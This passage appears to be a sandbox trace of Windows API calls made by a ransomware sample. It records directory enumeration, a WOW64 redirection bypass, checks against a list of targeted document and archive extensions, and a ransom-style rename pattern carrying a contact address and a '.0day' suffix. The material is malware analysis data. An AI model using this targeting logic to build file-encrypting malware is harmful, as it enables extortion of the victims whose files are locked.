hFindFile=0x3581100, lpFindFileData=0x30ef094 | out: lpFindFileData=0x30ef094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a65ec8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa92ba2a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0267.184] FindNextFileW (in: hFindFile=0x3581100, lpFindFileData=0x30ef094 | out: lpFindFileData=0x30ef094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f446eef, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f446eef, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fc22bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0267.184] FindClose (in: hFindFile=0x3581100 | out: hFindFile=0x3581100) returned 1 [0267.185] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x42c9068 | out: hHeap=0x4a0000) returned 1 [0267.185] FindNextFileW (in: hFindFile=0x3580f00, lpFindFileData=0x30ef310 | out: lpFindFileData=0x30ef310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fdc8b88, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa86cdff, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa0e2d73a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sports", cAlternateFileName="")) returned 1 [0267.185] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\*", lpFindFileData=0x30ef094 | out: lpFindFileData=0x30ef094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fdc8b88, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa86cdff, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa0e2d73a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3581140 [0267.187] FindNextFileW (in: hFindFile=0x3581140, lpFindFileData=0x30ef094 | out: lpFindFileData=0x30ef094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fdc8b88, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa86cdff, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa0e2d73a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0267.188] FindNextFileW (in: hFindFile=0x3581140, lpFindFileData=0x30ef094 | out: lpFindFileData=0x30ef094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ead378, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71ead378, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb5e, dwReserved0=0x0, dwReserved1=0x0, cFileName="CircleSubpicture.png", cAlternateFileName="")) returned 1 [0269.474] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\*", lpFindFileData=0x30ef094 | out: lpFindFileData=0x30ef094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7089b290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3581040 [0269.496] FindNextFileW (in: hFindFile=0x3581040, lpFindFileData=0x30ef094 | out: lpFindFileData=0x30ef094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7089b290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0269.496] FindNextFileW (in: hFindFile=0x3581040, lpFindFileData=0x30ef094 | out: lpFindFileData=0x30ef094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f046d00, ftCreationTime.dwHighDateTime=0x1bd9a89, ftLastAccessTime.dwLowDateTime=0x65f01310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6f046d00, ftLastWriteTime.dwHighDateTime=0x1bd9a89, nFileSizeHigh=0x0, nFileSizeLow=0xf77, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0143743.GIF", cAlternateFileName="")) returned 1 [0269.630] FindNextFileW (in: hFindFile=0x3580f00, lpFindFileData=0x30ef58c | out: lpFindFileData=0x30ef58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe5cd5260, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5cd5260, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0269.630] FindNextFileW (in: hFindFile=0x3580f00, lpFindFileData=0x30ef58c | out: lpFindFileData=0x30ef58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f664b00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5943160, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5f664b00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xd0aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adjacency.thmx", cAlternateFileName="ADJACE~1.THM")) returned 1 [0269.631] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\*", lpFindFileData=0x30ef310 | out: lpFindFileData=0x30ef310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c9cf70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x603f4990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x603f4990, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3581040 [0269.632] FindNextFileW (in: hFindFile=0x3581040, lpFindFileData=0x30ef310 | out: lpFindFileData=0x30ef310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c9cf70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x603f4990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x603f4990, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0269.632] FindNextFileW (in: hFindFile=0x3581040, lpFindFileData=0x30ef310 | out: lpFindFileData=0x30ef310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccc5300, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x51c9cf70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xccc5300, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adjacency.xml", cAlternateFileName="ADJACE~1.XML")) returned 1 [0271.742] FindNextFileW (in: hFindFile=0x3581140, lpFindFileData=0x30ef094 | out: lpFindFileData=0x30ef094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1887d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0271.743] FindNextFileW (in: hFindFile=0x3581140, lpFindFileData=0x30ef094 | out: lpFindFileData=0x30ef094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a1ecf00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0xfa1ae930, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6a1ecf00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x3bb60, dwReserved0=0x0, dwReserved1=0x0, cFileName="ANALYS32.XLL", cAlternateFileName="")) returned 1 [0271.743] FindNextFileW (in: hFindFile=0x3581040, lpFindFileData=0x30ef310 | out: lpFindFileData=0x30ef310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa671530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa671530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SOLVER", cAlternateFileName="")) returned 1 Thread: id = 63 os_tid = 0x69c [0265.353] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10000) returned 0x3520078 [0265.353] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10000) returned 0x3530080 [0265.354] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x5335c0 [0265.354] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x6) returned 0x521b80 [0265.354] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x5335d8 [0265.354] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x100000) returned 0x3ce0020 [0265.354] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x5335a8 [0265.354] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x5335a8, Size=0x20) returned 0x587b48 [0265.354] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x5335a8 [0265.354] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x5335a8, Size=0x20) returned 0x587b20 [0265.354] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74da0000 [0265.354] GetProcAddress (hModule=0x74da0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74dcd650 [0265.354] Wow64DisableWow64FsRedirection (in: OldValue=0x344ff58 | out: OldValue=0x344ff58*=0x0) returned 1 [0265.354] lstrlenW (lpString="kernel32.dll") returned 12 [0265.354] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x587b48 | out: hHeap=0x4a0000) returned 1 [0265.354] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0265.354] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x587b20 | out: hHeap=0x4a0000) returned 1 [0265.355] Sleep (dwMilliseconds=0x64) [0265.563] Sleep (dwMilliseconds=0x64) [0265.774] lstrcmpiW (lpString1=".exe", lpString2=".0day") returned 1 [0265.774] lstrlenW (lpString="ConvertInkStore.exe") returned 19 [0265.774] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0265.776] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=193024) returned 1 [0265.776] CloseHandle (hObject=0x2f4) returned 1 [0265.776] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe")) returned 0x20 [0265.776] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0265.776] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0265.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0265.776] lstrlenW (lpString=".doc") returned 4 [0265.776] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0265.776] lstrlenW (lpString=".docx") returned 5 [0265.776] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0265.776] lstrlenW (lpString=".pdf") returned 4 [0265.776] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0265.776] lstrlenW (lpString=".xls") returned 4 [0265.776] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0265.776] lstrlenW (lpString=".xlsx") returned 5 [0265.776] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0265.776] lstrlenW (lpString=".ppt") returned 4 [0265.776] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0265.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0265.776] lstrlenW (lpString=".zip") returned 4 [0265.777] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0265.777] lstrlenW (lpString=".rar") returned 4 [0265.777] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0265.777] lstrlenW (lpString=".bz2") returned 4 [0265.777] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0265.777] lstrlenW (lpString=".7z") returned 3 [0265.777] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0265.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0265.777] lstrlenW (lpString=".dbf") returned 4 [0265.777] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0265.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0265.777] lstrlenW (lpString=".1cd") returned 4 [0265.777] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0265.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0265.777] lstrlenW (lpString=".jpg") returned 4 [0265.777] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0265.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0265.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0265.777] lstrlenW (lpString=".doc") returned 4 [0265.777] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0265.777] lstrlenW (lpString=".docx") returned 5 [0265.777] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0265.777] lstrlenW (lpString=".pdf") returned 4 [0265.777] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0265.777] lstrlenW (lpString=".xls") returned 4 [0265.777] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0265.777] lstrlenW (lpString=".xlsx") returned 5 [0265.777] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0265.777] lstrlenW (lpString=".ppt") returned 4 [0265.777] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0265.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0265.777] lstrlenW (lpString=".zip") returned 4 [0265.777] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0265.777] lstrlenW (lpString=".rar") returned 4 [0265.777] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0265.777] lstrlenW (lpString=".bz2") returned 4 [0265.777] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0265.778] lstrlenW (lpString=".7z") returned 3 [0265.778] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0265.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0265.778] lstrlenW (lpString=".dbf") returned 4 [0265.778] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0265.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0265.778] lstrlenW (lpString=".1cd") returned 4 [0265.778] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0265.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0265.778] lstrlenW (lpString=".jpg") returned 4 [0265.778] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0265.778] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0265.778] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0265.778] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0265.843] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=3584) returned 1 [0265.843] CloseHandle (hObject=0x304) returned 1 [0265.845] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui")) returned 0x20 [0265.845] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0265.845] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.845] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0265.845] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0265.845] lstrlenW (lpString=".doc") returned 4 [0265.845] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0265.845] lstrlenW (lpString=".docx") returned 5 [0265.845] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0265.845] lstrlenW (lpString=".pdf") returned 4 [0265.845] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0265.845] lstrlenW (lpString=".xls") returned 4 [0265.845] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0265.845] lstrlenW (lpString=".xlsx") returned 5 [0265.845] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0265.845] lstrlenW (lpString=".ppt") returned 4 [0265.845] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0265.845] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0265.846] lstrlenW (lpString=".zip") returned 4 [0265.846] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0265.846] lstrlenW (lpString=".rar") returned 4 [0265.846] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0265.846] lstrlenW (lpString=".bz2") returned 4 [0265.846] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0265.846] lstrlenW (lpString=".7z") returned 3 [0265.846] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0265.846] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0265.846] lstrlenW (lpString=".dbf") returned 4 [0265.846] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0265.846] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0265.846] lstrlenW (lpString=".1cd") returned 4 [0265.846] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0265.846] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0265.846] lstrlenW (lpString=".jpg") returned 4 [0265.846] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0265.846] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0265.846] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0265.846] lstrlenW (lpString=".doc") returned 4 [0265.846] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0265.846] lstrlenW (lpString=".docx") returned 5 [0265.846] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0265.846] lstrlenW (lpString=".pdf") returned 4 [0265.846] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0265.846] lstrlenW (lpString=".xls") returned 4 [0265.846] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0265.846] lstrlenW (lpString=".xlsx") returned 5 [0265.846] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0265.846] lstrlenW (lpString=".ppt") returned 4 [0265.846] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0265.846] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0265.846] lstrlenW (lpString=".zip") returned 4 [0265.846] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0265.846] lstrlenW (lpString=".rar") returned 4 [0265.846] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0265.847] lstrlenW (lpString=".bz2") returned 4 [0265.847] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0265.847] lstrlenW (lpString=".7z") returned 3 [0265.847] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0265.847] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0265.847] lstrlenW (lpString=".dbf") returned 4 [0265.847] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0265.847] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0265.847] lstrlenW (lpString=".1cd") returned 4 [0265.847] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0265.847] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0265.847] lstrlenW (lpString=".jpg") returned 4 [0265.847] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0265.847] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0265.847] lstrlenW (lpString="FlickLearningWizard.exe.mui") returned 27 [0265.847] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0266.469] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=8704) returned 1 [0266.469] CloseHandle (hObject=0x308) returned 1 [0266.469] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui")) returned 0x20 [0266.469] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.469] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 84 [0266.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 84 [0266.469] lstrlenW (lpString=".doc") returned 4 [0266.469] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0266.469] lstrlenW (lpString=".docx") returned 5 [0266.469] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0266.469] lstrlenW (lpString=".pdf") returned 4 [0266.469] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0266.469] lstrlenW (lpString=".xls") returned 4 [0266.469] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0266.469] lstrlenW (lpString=".xlsx") returned 5 [0266.469] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0266.469] lstrlenW (lpString=".ppt") returned 4 [0266.469] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0266.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 84 [0266.469] lstrlenW (lpString=".zip") returned 4 [0266.469] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0266.469] lstrlenW (lpString=".rar") returned 4 [0266.469] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0266.469] lstrlenW (lpString=".bz2") returned 4 [0266.469] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0266.469] 